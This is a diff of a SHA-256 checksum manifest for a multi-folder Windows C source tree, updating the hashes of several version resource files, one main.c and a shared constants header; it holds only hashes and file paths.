@@ -83,7 +83,7 @@ beb7d48597345d0109ce51c7452292ba6e970eb8ed5f716ec035087aa3f045b3 *Source\Akagi\p
a65a782ee8e6ace52ce6e51a64220618ca6057cd0de9c306301ef7db6ce4473d *Source\Akatsuki\dllmain.c
e10acf379efd906f8bf06a28e3b0b5598618c109c8a30f43e831b42f6aaf1950 *Source\Akatsuki\export.def
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Akatsuki\resource.h
-b506b75f27c926e96400505f1c4dba6309b81283eac4bd38d7ee54c0e4aa43c6 *Source\Akatsuki\version.rc
+4be964507603af178e31d7cbdb373e4bd6cc8c405be07e94f3f0d1217047515a *Source\Akatsuki\version.rc
ed9e60aeb6f2426647cafd1c1a495d19735a977537d4ab188736f2f4dac5b5d4 *Source\Fubuki\dll.vcxproj
119a274dc329b1d3bc94ee836fc7a18612faa26a517ad04fc3f95cc548f2b1a1 *Source\Fubuki\dll.vcxproj.filters
f0b8b0d1d5b85c4324c8cbb21d94dd8db69fd21bb5e37491bbd6aa2297fa0fc7 *Source\Fubuki\dll.vcxproj.user
@@ -95,18 +95,18 @@ bbc77818711a5f5152b99ca50cb018575ce05ff59859c45eb4bb7353d86daca8 *Source\Fubuki\
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Fubuki\resource.h
4aa24c1115cc3ed71027f760c7564357c162a09de58d75b5e9037cd869fb2a8a *Source\Fubuki\uihacks.c
73e735426c5fab97a7289a7a57bc8bb21bce7b2b1995ae076c41027780ed88c9 *Source\Fubuki\uihacks.h
-ebceab69aab14e266650ff14dde76f5c0e65e38779ed868b76c3960310a2a8f7 *Source\Fubuki\version.rc
+c8baef1a5f32ab37d3883d18fd9d9ddfa6a0729472960892eecf2e8d149ab167 *Source\Fubuki\version.rc
b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94 *Source\Fubuki\winmm.h
f66280e29c2116d4b83f2c6899d8caf432f7a4d1ccc4e4cf4e72b05d0fbd1f25 *Source\Kamikaze\Kamikaze.msc
d090766c75d998b019d651fbb0c04112c6feb0f754628751682708e13baf2744 *Source\Kamikaze\Launcher.html
-f5e85b52a96d196e4131f145357153f74318f612657025f311832573f1404c9a *Source\Naka\main.c
+e54acaf84b54afaa2320803e0928ce9fbc19d8be3e8df4051b88f1b19cd836a5 *Source\Naka\main.c
4479c31a428b0672245b2eff026be202998a4f146ab90cd06ce44412a20bf462 *Source\Naka\naka.h
2e13d6847d5f730e7fcbb4a720614448cb364fc8df5dc0ed1694a63cc355b2e3 *Source\Naka\Naka.vcxproj
175c9fc0c7046d006a6db698144fab3b40bd191e15617e7fba417a466c3a0b6f *Source\Naka\Naka.vcxproj.filters
e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221 *Source\Naka\Naka.vcxproj.user
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h
-70302e7507ec5beb4959b70a4d91ac4a40b09f2be3e4025ffe166cf824e77857 *Source\Shared\consts.h
+fc2b0b243e1d7bf63e3f81fbd94d8bc578b7ad0b9fe69843a8e0168b2f57a9a4 *Source\Shared\consts.h
01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c
b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h
133f71bd8d6d4ca80a9a542c2492ba9a65e05b0cfa681a85dd05d9cf998a1bb4 *Source\Shared\libinc.h